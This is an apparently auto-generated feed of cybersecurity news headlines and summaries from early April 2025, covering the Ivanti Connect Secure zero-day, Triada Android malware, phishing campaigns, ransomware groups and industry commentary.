    In 56% of Sophos managed detection and response (MDR) and incident response (IR) cases, attackers gained initial access to networks by exploiting external remote services, including edge devices such as firewalls and VPNs, and by leveraging valid accounts. Compromised credentials remain the top cause of attacks: The combination of external remote services and valid accounts aligns with the top root causes of attacks. For the second year in a row, compromised credentials were the number one … More

    The post Cybercriminals exfiltrate data in just three days appeared first on Help Net Security.

    "

    Autosummary: In 56% of Sophos managed detection and response (MDR) and incident response (IR) cases, attackers gained initial access to networks by exploiting external remote services, including edge devices such as firewalls and VPNs, and by leveraging valid accounts. When analyzing MDR and IR investigations, the Sophos X-Ops team looked specifically at ransomware, data exfiltration, and data extortion cases to identify how fast attackers progressed through the stages of an attack within an organization. "


    Open-source malware doubles, data exfiltration attacks dominate

    exploits
    2025-04-03 https://www.helpnetsecurity.com/2025/04/03/open-source-malware-index-q1-2025/

    There’s been a notable shift in the types of threats targeting software developers, with a total of 17,954 open source malware packages identified in Q1 2025, according to Sonatype. Quarterly breakdown (Source: Sonatype) The Q1 figure represents a significant decrease from the more than 34,000 malicious packages discovered last quarter, largely due to a sharp drop in security holdings packages. However, compared to the same period last year, the overall malware count more than doubled. … More

    The post Open-source malware doubles, data exfiltration attacks dominate appeared first on Help Net Security.

    "

    Autosummary: "


    Beware fake AutoCAD, SketchUp sites dropping malware

    exploits
    2025-04-03 https://www.helpnetsecurity.com/2025/04/03/fake-autocad-sketchup-malware/

    Malware peddlers are saddling users with the TookPS downloader and the Lapmon and TeviRat backdoors via malicious sites that mimic official ones and ostensibly offer legitimate software for download, Kaspersky researchers have warned. Malicious websites (Source: Kaspersky) The list of impersonated software includes: UltraViewer (remote desktop software), AutoCAD (2D and 3D computer-aided design software app), SketchUp (3D modeling software), Ableton (music production software), Quicken (personal finance app). “To protect against these attacks, users are advised … More

    The post Beware fake AutoCAD, SketchUp sites dropping malware appeared first on Help Net Security.

    "

    Autosummary: "


    7 ways to get C-suite buy-in on that new cybersecurity tool

    ciber
    2025-04-03 https://www.helpnetsecurity.com/2025/04/03/c-suite-cybersecurity-tool-buy-in/

    You’re in the middle of a sprint, juggling deadlines, debugging code, fine-tuning pipelines, and then it happens—you stumble across the perfect cybersecurity tool. It promises to eliminate secrets in logs, reduce risks in CI/CD pipelines, and save countless hours chasing security anomalies. But there’s one final boss to clear: the C-suite. Convincing leadership, especially those more attuned to balance sheets than breach reports, can feel like selling a Wi-Fi router to someone without any internet … More

    The post 7 ways to get C-suite buy-in on that new cybersecurity tool appeared first on Help Net Security.

    "

    Autosummary: Securing buy-in is the path forward. Ultimately, the key is to speak the C-suite’s language, one that prioritizes outcomes over features, strategy over tactics, and growth over stagnation. Lead with business value, not features: Executives care about outcomes, such as cost savings, operational efficiency, and competitive edge. You’re in the middle of a sprint, juggling deadlines, debugging code, fine-tuning pipelines, and then it happens—you stumble across the perfect cybersecurity tool. For instance, if the tool reduces detection and response times from five hours to one, reclaiming four hours per incident, and your team handles 100 incidents annually, the value becomes tangible. "


    Building a cybersecurity strategy that survives disruption

    ciber
    2025-04-03 https://www.helpnetsecurity.com/2025/04/03/building-cybersecurity-strategy/

    Cybersecurity isn’t what it used to be. Attackers are moving quicker, disruptions happen all the time, and many security plans built for more predictable times just can’t keep up. With everything from ransomware to geopolitical threats to cloud slip-ups hitting companies, there’s a shift happening: security needs to be ready for chaos, not just focused on keeping things safe. That shift changes everything: how companies plan, how they invest, and how they recover. From protection … More

    The post Building a cybersecurity strategy that survives disruption appeared first on Help Net Security.

    "

    Autosummary: “Forging strong partnerships with key stakeholders, including IT teams, executive leadership, and external cybersecurity experts, enhances the effectiveness of cybersecurity strategy. Invest in automation to enhance the efficiency of detection, triage, and initial response tasks, while orchestration platforms enable coordinated workflows across security and IT tools, significantly boosting response agility. Resilience is a whole-organisation challenge, requiring collaboration among the CISO, CIO, COO, and department heads. Such collaboration ensures that security measures are integrated seamlessly into business operations and receive buy-in,” Kory Daniels, CISO at Trustwave, told Help Net Security. “The work of the CISO is ongoing, requiring constant vigilance, continuous learning, and the ability to quickly pivot strategies in response to emerging risks and technological advancements.” Investing time in creating thorough, system-specific recovery plans fosters engagement, ensures clarity during emergencies, and highlights additional steps or resources that should be addressed beforehand. "


    Google Patches Quick Share Vulnerability Enabling Silent File Transfers Without Consent

    exploits
    2025-04-03 https://thehackernews.com/2025/04/google-patches-quick-share.html
    Cybersecurity researchers have disclosed details of a new vulnerability impacting Google’s Quick Share data transfer utility for Windows that could be exploited to achieve a denial-of-service (DoS) or send arbitrary files to a target’s device without their approval. The flaw, tracked as CVE-2024-10668 (CVSS score: 5.9), is a bypass for two of the 10 shortcomings that were originally disclosed by "

    Autosummary: "


    Triada Malware Preloaded on Counterfeit Android Phones Infects 2,600+ Devices

    exploits
    2025-04-03 https://thehackernews.com/2025/04/triada-malware-preloaded-on-counterfeit.html
    Counterfeit versions of popular smartphone models that are sold at reduced prices have been found to be preloaded with a modified version of an Android malware called Triada. "More than 2,600 users in different countries have encountered the new version of Triada, the majority in Russia," Kaspersky said in a report. The infections were recorded between March 13 and 27, 2025.  Triada is the "

    Autosummary: The latest samples of the malware analyzed by Kaspersky show that they are located in the system framework, thus allowing it to be copied to every process on the smartphone and giving the attackers unfettered access and control to perform various activities: steal user accounts associated with instant messengers and social networks, such as Telegram and TikTok; stealthily send WhatsApp and Telegram messages to other contacts on behalf of the victim and delete them in order to remove traces; act as a clipper by hijacking clipboard content with cryptocurrency wallet addresses to replace them with a wallet under their control; monitor web browser activity and replace links; replace phone numbers during calls; intercept SMS messages and subscribe victims to premium SMS; download other programs; block network connections to interfere with the normal functioning of anti-fraud systems. It’s worth noting that Triada is not the only malware that has been preloaded on Android devices during the manufacturing stages. "


    Legacy Stripe API Exploited to Validate Stolen Payment Cards in Web Skimmer Campaign

    exploits
    2025-04-03 https://thehackernews.com/2025/04/legacy-stripe-api-exploited-to-validate.html
    Threat hunters are warning of a sophisticated web skimmer campaign that leverages a legacy application programming interface (API) from payment processor Stripe to validate stolen payment information prior to exfiltration. "This tactic ensures that only valid card data is sent to the attackers, making the operation more efficient and potentially harder to detect," Jscrambler researchers Pedro "

    Autosummary: "This tactic ensures that only valid card data is sent to the attackers, making the operation more efficient and potentially harder to detect," Jscrambler researchers Pedro Fortuna, David Alves, and Pedro Marrucho said in a report. "


    New Triada Trojan comes preinstalled on Android devices

    exploits
    2025-04-03 https://securityaffairs.com/176143/malware/new-triada-comes-preinstalled-on-android-devices.html
    A new Triada trojan variant comes preinstalled on Android devices, stealing data on setup, warn researchers from Kaspersky. Kaspersky researchers discovered a new Triada trojan variant preinstalled on thousands of Android devices, enabling data theft upon setup. Kaspersky detected 2,600+ infections in Russia from March 13-27, 2025. The malware was discovered on counterfeit Android devices mimicking […] "

    Autosummary: New Triada Trojan comes preinstalled on Android devices Pierluigi Paganini April 03, 2025 A new Triada trojan variant comes preinstalled on Android devices, stealing data on setup, warn researchers from Kaspersky. "


    AI Threats Are Evolving Fast — Learn Practical Defense Tactics in this Expert Webinar

    industry
    2025-04-03 https://thehackernews.com/2025/04/ai-threats-are-evolving-fast-learn.html
    The rules have changed. Again. Artificial intelligence is bringing powerful new tools to businesses. But it’s also giving cybercriminals smarter ways to attack. They’re moving quicker, targeting more precisely, and slipping past old defenses without being noticed. And here’s the harsh truth: If your security strategy hasn’t evolved with AI in mind, you’re already behind. But you’re not alone—and "

    Autosummary: What You"ll Learn: How attackers are using AI—and how you can think like them The latest threat trends you might not know about yet Easy-to-follow strategies for securing AI use in your company Why Zero Trust is key to staying safe is key to staying safe A practical approach to building long-term cyber resilience Cyber threats won"t wait. "


    Texas State Bar warns of data breach after INC ransomware claims attack

    financial exploits government ransomware
    2025-04-03 https://www.bleepingcomputer.com/news/security/texas-state-bar-warns-of-data-breach-after-inc-ransomware-claims-attack/
    The State Bar of Texas is warning it suffered a data breach after the INC ransomware gang claimed to have breached the organization and began leaking samples of stolen data. [...] "

    Autosummary: "


    Recent GitHub supply chain attack traced to leaked SpotBugs token

    exploits
    2025-04-03 https://www.bleepingcomputer.com/news/security/recent-github-supply-chain-attack-traced-to-leaked-spotbugs-token/
    A cascading supply chain attack on GitHub that targeted Coinbase in March has now been traced back to a single token stolen from a SpotBugs workflow, which allowed a threat actor to compromise multiple GitHub projects. [...]

    Autosummary: GitHub Actions logs, especially those from March 10-14, 2025, should be audited for signs of secrets being printed, especially base64-encoded blobs.


    HellCat ransomware: what you need to know

    exploits ransomware
    2025-04-03 https://www.tripwire.com/state-of-security/hellcat-ransomware-what-you-need-know
    HellCat - the ransomware gang that has been known to demand payment... in baguettes! Are they rolling in the dough? Bread it and weep in my article on the Tripwire State of Security blog.

    Autosummary: Reported victims of the HellCat ransomware have included Israel’s parliament The Knesset (extracting 64GB of sensitive data), Jordan’s Ministry of Education (stealing images of ID cards, divorce papers, and various letters addressed to the Minister), and mobile device provider Transsion. The note left by the attackers promises that paying the ransom will not only deliver you the decryptor, but also "a description of your network vulnerabilities and information security recommendations." Like many other ransomware operations, HellCat breaks into organisations, steals sensitive files, and encrypts computer systems - demanding a ransom payment for a decryption key and to prevent the leaking of stolen files.


    Lazarus Group Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware

    exploits
    2025-04-03 https://thehackernews.com/2025/04/lazarus-group-targets-job-seekers-with.html
    The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the cryptocurrency sector to deliver a previously undocumented Go-based backdoor called GolangGhost on Windows and macOS systems. The new activity, assessed to be a continuation of the campaign, has been codenamed ClickFake Interview by

    Autosummary: The IT workers have also been observed undertaking various projects in the United Kingdom related to web development, bot development, content management system (CMS) development, and blockchain technology, often falsifying their identities and claiming to be from Italy, Japan, Malaysia, Singapore, Ukraine, the United States, and Vietnam. A notable aspect of the campaign is that it primarily targets centralized finance entities by impersonating companies like Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit, marking a departure from the hacking group’s attacks against decentralized finance (DeFi) entities.


    Ivanti patches Connect Secure zero-day exploited since mid-March

    exploits
    2025-04-03 https://www.bleepingcomputer.com/news/security/ivanti-patches-connect-secure-zero-day-exploited-since-mid-march/
    Ivanti has released security updates to patch a critical Connect Secure remote code execution vulnerability exploited by a China-linked espionage actor to deploy malware since at least mid-March 2025. [...]

    Autosummary: Patch status (partial table): Contact Ivanti to migrate; Ivanti Policy Secure 22.7R1.3 and prior – 22.7R1.4 (April 21); ZTA Gateways 22.8R2 and prior – 22.8R2.2 (April 19). Attacks linked to UNC5221 Chinese-nexus cyberspies: While Ivanti has yet to disclose more details regarding CVE-2025-22457 attacks, Mandiant and Google Threat Intelligence Group (GTIG) security researchers revealed today that a suspected China-nexus espionage actor tracked as UNC5221 has exploited the vulnerability since at least mid-March 2025.


    Ivanti VPN customers targeted via unrecognized RCE vulnerability (CVE-2025-22457)

    exploits
    2025-04-03 https://www.helpnetsecurity.com/2025/04/03/ivanti-vpn-customers-targeted-via-unrecognized-rce-vulnerability-cve-2025-22457/

    A suspected Chinese APT group has exploited CVE-2025-22457 – a buffer overflow bug that was previously thought not to be exploitable – to compromise appliances running Ivanti Connect Secure (ICS) 22.7R2.5 or earlier or Pulse Connect Secure 9.1x. The vulnerability was patched by Ivanti in ICS 22.7R2.6, released on February 11, 2025. But, apparently, the threat actor studied the patch and “uncovered through a complicated process, [that] it was possible to exploit 22.7R2.5 and earlier … More

    The post Ivanti VPN customers targeted via unrecognized RCE vulnerability (CVE-2025-22457) appeared first on Help Net Security.


    Autosummary: Once in, the attackers deployed two new malware families – the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor – as well as elements of the SPAWN malware ecosystem that was seen in previous UNC5221 attacks, including: SPAWNSLOTH, a log tampering utility; SPAWNSNARE, a utility used to extract the uncompressed linux kernel image (vmlinux) into a file and encrypt it; SPAWNWAVE, a tool combining the capabilities of the SPAWNCHIMERA and RESURGE malware families; and a modified version of Ivanti’s Integrity Checker Tool (ICT) to evade detection. “[Google Threat Intelligence Group (GTIG)] assesses that UNC5221 will continue pursuing zero-day exploitation of edge devices based on their consistent history of success and aggressive operational tempo.”


    Microsoft Warns of Tax-Themed Email Attacks Using PDFs and QR Codes to Deliver Malware

    exploits
    2025-04-03 https://thehackernews.com/2025/04/microsoft-warns-of-tax-themed-email.html
    Microsoft is warning of several phishing campaigns that are leveraging tax-related themes to deploy malware and steal credentials. "These campaigns notably use redirection methods such as URL shorteners and QR codes contained in malicious attachments and abuse legitimate services like file-hosting services and business profile pages to avoid detection," Microsoft said in a report shared with The

    Autosummary: "The threat actor likely used Facebook to drive traffic to the fake Windows 11 Pro download pages, as we observed Facebook referrer URLs in multiple cases," Microsoft said in a series of posts on X. "Latrodectus 1.9, the malware’s latest evolution first observed in February 2025, reintroduced the scheduled task for persistence and added command 23, enabling the execution of Windows commands via "cmd.exe /c ."" The disclosure also follows a surge in campaigns that use QR codes in phishing documents to disguise malicious URLs as part of widespread attacks aimed at Europe and the U.S., resulting in credential theft.


    China-linked group UNC5221 exploited Ivanti Connect Secure zero-day since mid-March

    exploits
    2025-04-03 https://securityaffairs.com/176162/apt/china-linked-group-unc5221-exploited-ivanti-connect-secure-zero-day-since-mid-march.html
    Ivanti addressed a critical remote code execution flaw in Connect Secure, which has been exploited since at least mid-March 2025. Ivanti released security updates to address a critical Connect Secure remote code execution vulnerability tracked as CVE-2025-22457. The vulnerability has been exploited by a China-linked threat actor since at least mid-March 2025. Ivanti did not disclose […]

    Autosummary: China-linked group UNC5221 exploited Ivanti Connect Secure zero-day since mid-March. Pierluigi Paganini, April 03, 2025. Ivanti addressed a critical remote code execution flaw in Connect Secure, which has been exploited since at least mid-March 2025.


    Hunters International shifts from ransomware to pure data extortion

    exploits ransomware
    2025-04-03 https://www.bleepingcomputer.com/news/security/hunters-international-rebrands-as-world-leaks-in-shift-to-data-extortion/
    The Hunters International Ransomware-as-a-Service (RaaS) operation is shutting down and rebranding with plans to switch to data theft and extortion-only attacks. [...]



    BlueToolkit: Open-source Bluetooth Classic vulnerability testing framework

    exploits
    2025-04-02 https://www.helpnetsecurity.com/2025/04/02/bluetoolkit-open-source-bluetooth-classic-vulnerability-testing-framework/

    BlueToolkit is an open-source tool that helps find security flaws in Bluetooth Classic devices. It runs known and custom exploits to test if a device is vulnerable. Right now, it includes 43 different exploits. Some are public, and others were made specifically for this toolkit. “The framework allows you to reuse PoCs of different attacks and connect your own hardware with minimal code/configuration needed. The concept is simple and known – vulnerability scanners make use … More

    The post BlueToolkit: Open-source Bluetooth Classic vulnerability testing framework appeared first on Help Net Security.


    Autosummary: Researchers have already used the framework to find 64 vulnerabilities in 22 cars (Audi, BMW, Chevrolet, Honda, Hyundai, Mercedes-Benz, Mini, Opel, Polestar, Renault, Skoda, Toyota, VW, Tesla).


    Only 1% of malicious emails that reach inboxes deliver malware

    exploits
    2025-04-02 https://www.helpnetsecurity.com/2025/04/02/email-attacks-social-engineering/

    99% of email threats reaching corporate user inboxes in 2024 were response-based social engineering attacks or contained phishing links, according to Fortra. Only 1% of malicious emails that reached user inboxes delivered malware. This shows that while common pre-delivery email defenses are effective at stopping malware, they are far less capable of blocking high risk threats like business email compromise and credential phishing. 49% of the Q4 attacks targeted Microsoft 365 credentials as they can … More

    The post Only 1% of malicious emails that reach inboxes deliver malware appeared first on Help Net Security.


    Autosummary: Tools for development, email, business services, etc., provide cybercriminals with infrastructure at zero cost. Fortra expects cybercriminals to use this data to personalize attacks even further, utilizing information about individuals, their families, their co-workers, etc.


    New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth

    exploits
    2025-04-02 https://thehackernews.com/2025/04/new-malware-loaders-use-call-stack.html
    Cybersecurity researchers have discovered an updated version of a malware loader called Hijack Loader that implements new features to evade detection and establish persistence on compromised systems. "Hijack Loader released a new module that implements call stack spoofing to hide the origin of function calls (e.g., API and system calls)," Zscaler ThreatLabz researcher Muhammed Irfan V A said in

    Autosummary: The SHELBYC2 backdoor, for its part, parses commands listed in another file named "Command.txt" to download/upload files from/to a GitHub repository, load a .NET binary reflectively, and run PowerShell commands. SHELBY Malware Uses GitHub for Command-and-Control: The development comes as Elastic Security Labs detailed a new malware family dubbed SHELBY that uses GitHub for command-and-control (C2), data exfiltration, and remote control.


    Helping Your Clients Achieve NIST Compliance: A Step by Step Guide for Service Providers

    Telcos
    2025-04-02 https://thehackernews.com/2025/04/helping-your-clients-achieve-nist.html
    Introduction As the cybersecurity landscape evolves, service providers play an increasingly vital role in safeguarding sensitive data and maintaining compliance with industry regulations. The National Institute of Standards and Technology (NIST) offers a comprehensive set of frameworks that provide a clear path to achieving robust cybersecurity practices. For service providers, adhering to NIST

    Autosummary: Key NIST Frameworks for Compliance: NIST offers multiple cybersecurity frameworks, but the most relevant for service providers include the NIST Cybersecurity Framework (CSF 2.0), a flexible, risk-based framework designed for businesses of all sizes and industries. For service providers, achieving NIST compliance means enhanced security: improved ability to identify, assess, and mitigate cybersecurity risks. Step-by-Step Guide to Achieving NIST Compliance: As mentioned above, achieving NIST compliance for clients presents numerous challenges for service providers, making the process complex and daunting. Limited budgets are a frequent obstacle for many organizations, making it essential to focus on high-impact controls, leverage open-source tools, and automate compliance tasks to manage costs effectively.


    Outlaw Group Uses SSH Brute-Force to Deploy Cryptojacking Malware on Linux Servers

    exploits Linux
    2025-04-02 https://thehackernews.com/2025/04/outlaw-group-uses-ssh-brute-force-to.html
    Cybersecurity researchers have shed light on an "auto-propagating" cryptocurrency mining botnet called Outlaw (aka Dota) that’s known for targeting SSH servers with weak credentials. "Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis

    Autosummary: "Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis published Tuesday.


    Apple backported fixes for three actively exploited flaws to older devices

    exploits
    2025-04-02 https://securityaffairs.com/176119/security/apple-backported-fixes-for-three-actively-exploited-flaws-to-older-devices.html
    Apple backports three critical vulnerabilities actively exploited in attacks against older iOS and macOS models. Apple has backported fixes for three actively exploited vulnerabilities to older devices and OS versions.

    Autosummary: Apple released the following updates, available for the following devices: iOS 15.8.4 and iPadOS 15.8.4 – iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation); iOS 16.7.11 and iPadOS 16.7.11 – iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation; iPadOS 17.7.6 – iPad Pro 12.9-inch 2nd generation, iPad Pro 10.5-inch, and iPad 6th generation.


    Police shuts down KidFlix child sexual exploitation platform

    exploits
    2025-04-02 https://www.bleepingcomputer.com/news/security/police-shuts-down-kidflix-child-sexual-exploitation-platform/
    Kidflix, one of the largest platforms used to host, share, and stream child sexual abuse material (CSAM) on the dark web, was shut down on March 11 following a joint action coordinated by German law enforcement. [...]

    Autosummary: Kidflix, one of the largest platforms used to host, share, and stream child sexual abuse material (CSAM) on the dark web, was shut down on March 11 following a joint action coordinated by German law enforcement.


    Counterfeit Android devices found preloaded with Triada malware

    exploits
    2025-04-02 https://www.bleepingcomputer.com/news/security/counterfeit-android-devices-found-preloaded-with-triada-malware/
    A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up. [...]



    Travelers Cyber Risk Services reduces the risk of a cyberattack

    ciber
    2025-04-02 https://www.helpnetsecurity.com/2025/04/02/travelers-cyber-risk-services/

    The Travelers Companies announced Travelers Cyber Risk Services, a suite of capabilities added to all cyber liability policies designed to help lower both the risk of a cyberattack and the cost to recover from one. In addition to always-on threat monitoring and tailored alerts, key benefits of Travelers Cyber Risk Services include: Cyber Risk Dashboard: This 24/7 tool gives consumers the ability to monitor risks and track progress over time, view customized recommendations ranked by … More

    The post Travelers Cyber Risk Services reduces the risk of a cyberattack appeared first on Help Net Security.


    Autosummary: “This new suite of services is designed to help customers more efficiently and effectively predict, prevent and recover from cyber incidents,” said Lauren Winchester, Head of Cyber Risk Services at Travelers.


    Google Fixed Cloud Run Vulnerability Allowing Unauthorized Image Access via IAM Misuse

    exploits Linux
    2025-04-02 https://thehackernews.com/2025/04/google-fixed-cloud-run-vulnerability.html
    Cybersecurity researchers have disclosed details of a now-patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run that could have allowed a malicious actor to access container images and even inject malicious code. "The vulnerability could have allowed such an identity to abuse its Google Cloud Run revision edit permissions in order to pull private Google Artifact

    Autosummary: The disclosure comes weeks after Praetorian detailed several ways a lower-privilege principal can abuse an Azure virtual machine (VM) to gain control over an Azure subscription: execute commands on an Azure VM associated with an administrative managed identity; log in to an Azure VM associated with an administrative managed identity; attach an existing administrative user-assigned managed identity to an existing Azure VM and execute commands in that VM; or create a new Azure VM, attach an existing administrative managed identity to it, and execute commands in that VM by using data plane actions. "After obtaining the Owner role for a subscription, an attacker may be able to leverage their broad control over all subscription resources to find a privilege escalation path to the Entra ID tenant," security researchers Andrew Chang and Elgin Lee said.


    U.S. CISA adds Apache Tomcat flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-04-02 https://securityaffairs.com/176129/security/u-s-cisa-adds-apache-tomcat-flaw-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apache Tomcat flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apache Tomcat path equivalence vulnerability, tracked as CVE-2025-24813, to its Known Exploited Vulnerabilities (KEV) catalog. The Apache Tomcat vulnerability CVE-2025-24813 was recently disclosed and is being actively exploited just 30 […]

    Autosummary: “If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files: writes enabled for the default servlet (disabled by default); support for partial PUT (enabled by default); a target URL for security sensitive uploads that is a sub-directory of a target URL for public uploads; attacker knowledge of the names of security sensitive files being uploaded; the security sensitive files also being uploaded via partial PUT. If all of the following were true, a malicious user was able to perform remote code execution: writes enabled for the default servlet (disabled by default); support for partial PUT (enabled by default); application was using Tomcat’s file based session persistence with the default storage location; application included a library that may be leveraged in a deserialization attack.” Tomcat versions 9.0.99, 10.1.35, and 11.0 addressed the vulnerability.


    Smashing Security podcast #411: The fall of Troy, and whisky barrel scammers

    financial
    2025-04-02 https://grahamcluley.com/smashing-security-podcast-411/
    Renowned cybersecurity expert Troy Hunt falls victim to a phishing attack, resulting in the exposure of thousands of subscriber details, and don’t lose your life savings in a whisky scam... All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. Plus! Don’t miss our featured interview with Alastair Paterson, CEO and co-founder of Harmonic Security, discussing how companies can adopt Generative AI without putting their sensitive data at risk.

    Autosummary: Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Episode links: Sponsored by: Harmonic – Let your teams adopt AI tools safely by protecting sensitive data in real time with minimal effort.


    Cybersecurity jobs available right now: April 1, 2025

    ciber
    2025-04-01 https://www.helpnetsecurity.com/2025/04/01/cybersecurity-jobs-available-right-now-april-1-2025/

    Cloud Security Engineer Fexco | Ireland | Hybrid – View job details As a Cloud Security Engineer, you will design and implement security frameworks for cloud environments. Enforce secure access policies, MFA, and least privilege principles. Develop automated security solutions using IaC and scripting. Perform security assessments and recommend improvements. Cyber Security Analyst Shannex | Canada | On-site – View job details As a Cyber Security Analyst, you will develop and maintain security architecture principles, … More

    The post Cybersecurity jobs available right now: April 1, 2025 appeared first on Help Net Security.


    Autosummary: Senior Engineer – Cyber Security Presight | UAE | On-site – View job details As a Senior Engineer – Cyber Security, you will architect, deploy, and manage security controls across EDR, NDR, PAM, SIEM (Splunk), MDM, and endpoint security ecosystems, ensuring continuous threat visibility and response. Information Security Engineer CareDx | USA | Hybrid – View job details As an Information Security Engineer, you will design, deploy, and manage comprehensive security architectures and tools, including SIEM, EDR, firewalls, IDPS, and WAF. Software Engineer, Security Zip | USA | On-site – View job details As a Software Engineer, Security, you will develop features to improve security and mitigate risk within Zip’s products, such as multi-region user authentication, account take-over detection systems, and universal audit trails. Cyber Security Analyst Shannex | Canada | On-site – View job details As a Cyber Security Analyst, you will develop and maintain security architecture principles, strategy and practices, roadmaps, and technical applications to engineer reliable solutions and measures for the business.MT | Malta | Hybrid – View job details As a Technical Lead and Security Specialist, you will be responsible for the development and implementation of a security risk management plan, as well as for initial and periodic information security risk assessments, analysis, mitigation, and remediation.


    Why global tensions are a cybersecurity problem for every business

    ciber
    2025-04-01 https://www.helpnetsecurity.com/2025/04/01/global-tensions-cybersecurity-problem/

    With global tensions climbing, cyber attacks linked to nation-states and their allies are becoming more common, sophisticated, and destructive. For organizations, cybersecurity can’t be treated as separate from world events anymore; the two are closely connected. Conflict between countries is spilling into cyberspace. Whether it’s during military escalations, trade disputes, or diplomatic standoffs, governments are using cyber operations to exert pressure, gather intelligence, or disrupt systems. These attacks often hit private businesses, not just governments or critical … More

    The post Why global tensions are a cybersecurity problem for every business appeared first on Help Net Security.


    Autosummary: Whether it’s during military escalations, trade disputes, or diplomatic standoffs, governments are using cyber operations to exert pressure, gather intelligence, or disrupt systems. Andrew Ginter, VP of Industrial Security at Waterfall Security, urges OT sites to take a hard look at their evolving risk landscape, especially as they adopt Internet-connected industrial services and AI-driven efficiencies. According to DeBolt, “Heightened geopolitical tensions have reflected this transition in groups originating from China, Iran, and North Korea over the last couple of years—although the latter is somewhat more well-known for its duplicitous activity that often blurs the line of more traditional e-crime threats.” Michael DeBolt, Chief Intelligence Officer at Intel 471, explains: “Increasing polarization worldwide has seen the expansion of the state-backed threat actor role, with many established groups taking on financially motivated responsibilities alongside their other strategic goals.” Don’t just involve IT, bring in legal, compliance, communications, and business units. With global tensions climbing, cyber attacks linked to nation-states and their allies are becoming more common, sophisticated, and destructive. “We’re seeing bricked controllers causing prolonged outages, damaged heavy equipment leading to even longer downtimes, and compromised safety systems—none of which are acceptable,” Ginter warns.


    How to build an effective cybersecurity simulation

    ciber
    2025-04-01 https://www.helpnetsecurity.com/2025/04/01/cybersecurity-simulations-exercise/

    Most people groan at the prospect of security training. It’s typically delivered through dull online videos or uninspiring exercises that fail to capture real-world urgency. To make a real difference in cyber crisis readiness, personnel need the opportunity to test their mettle in a crisis, to build the muscle memory and decision-making skills that will make a difference when a real attack occurs. This is where cyber simulations come in, by providing the opportunity to … More

    The post How to build an effective cybersecurity simulation appeared first on Help Net Security.


    Autosummary: To make a real difference in cyber crisis readiness, personnel need the opportunity to test their mettle in a crisis, to build the muscle memory and decision-making skills that will make a difference when a real attack occurs. However, there should be a strong collaborative aspect, with input from security, disaster recovery, and other involved teams. This could be technical capabilities, executive decision-making, cross-team coordination, or a combination of factors. Highly granular data is important here, letting you delve in by department, team, and individual performance. Achieving real cyber crisis readiness: Cybersecurity simulations are not just a compliance exercise – they build real-world resilience, helping companies prepare for a genuine crisis.


    Generative AI Is reshaping financial fraud. Can security keep up?

    financial
    2025-04-01 https://www.helpnetsecurity.com/2025/04/01/yinglian-xie-datavisor-fraud-prevention-strategies/

    In this Help Net Security interview, Yinglian Xie, CEO at DataVisor, explains how evolving fraud tactics require adaptive, AI-driven prevention strategies. With fraudsters using generative AI to launch sophisticated attacks, financial institutions must adopt adaptive AI solutions to stay ahead. Xie points out the role of real-time data orchestration, machine learning, and integrated security platforms in balancing fraud prevention with a seamless user experience. How are fraud tactics evolving with the rise of generative AI … More

    The post Generative AI Is reshaping financial fraud. Can security keep up? appeared first on Help Net Security.


    Autosummary: For example, a fraud ring conducting large-scale coordinated attacks involving account takeover and mass registration could use different IPs and device IDs, IP addresses traced back to VPN or data centers, the recurrence of specific payee account numbers, etc. In this Help Net Security interview, Yinglian Xie, CEO at DataVisor, explains how evolving fraud tactics require adaptive, AI-driven prevention strategies. Sophisticated AI technologies and machine learning models can analyze large sets of data and signals in real-time to identify hidden patterns and correlations through usage patterns, device information, location information, network characteristics.


    Hiding WordPress malware in the mu-plugins directory to avoid detection

    exploits
    2025-04-01 https://securityaffairs.com/176083/malware/wordpress-malware-in-the-mu-plugins-directory.html
    Sucuri researchers spotted threat actors deploying WordPress malware in the mu-plugins directory to evade security checks. In February, Sucuri warned of threat actors exploiting WordPress mu-plugins, which auto-load without activation, to maintain persistence and evade detection by hiding backdoors in the plugin directory. “Unlike regular plugins, must-use plugins are automatically loaded on every page load, […]

    Autosummary: Hiding WordPress malware in the mu-plugins directory to avoid detection. Pierluigi Paganini, April 01, 2025. Sucuri researchers spotted threat actors deploying WordPress malware in the mu-plugins directory to evade security checks. The script constructs a URL, sends requests to an external server, fetches content via file_get_contents() or cURL, modifies robots.txt, checks response markers, and pings sitemaps.


    “Urgent reminder” tax scam wants to phish your Microsoft credentials

    financial
    2025-04-01 https://www.malwarebytes.com/blog/news/2025/04/urgent-reminder-tax-scam-wants-to-phish-your-microsoft-credentials
    With tax season in full swing, we’re seeing scammers flexing their social engineering muscles. Be prepared.

    Autosummary: Even though scammers can use Artificial Intelligence to create convincing emails that appear to come from the IRS, there are often some tell-tale signs of social engineering attempts: Too good to be true: Huge, unexpected tax returns are usually just an incentive to get you to surrender private information in the hopes of obtaining that sum. Never send sensitive personal information such as your bank account, charge card, or Social Security number by email. The scam email reads: “Dear receiver, As part of our ongoing efforts to ensure compliance with the latest tax regulations, we are conducting a mandatory review and update of your tax records.”


    Hackers exploit little-known WordPress MU-plugins feature to hide malware

    exploits
    2025-04-01 https://www.bitdefender.com/en-us/blog/hotforsecurity/hackers-exploit-little-known-wordpress-mu-plugins-feature-to-hide-malware
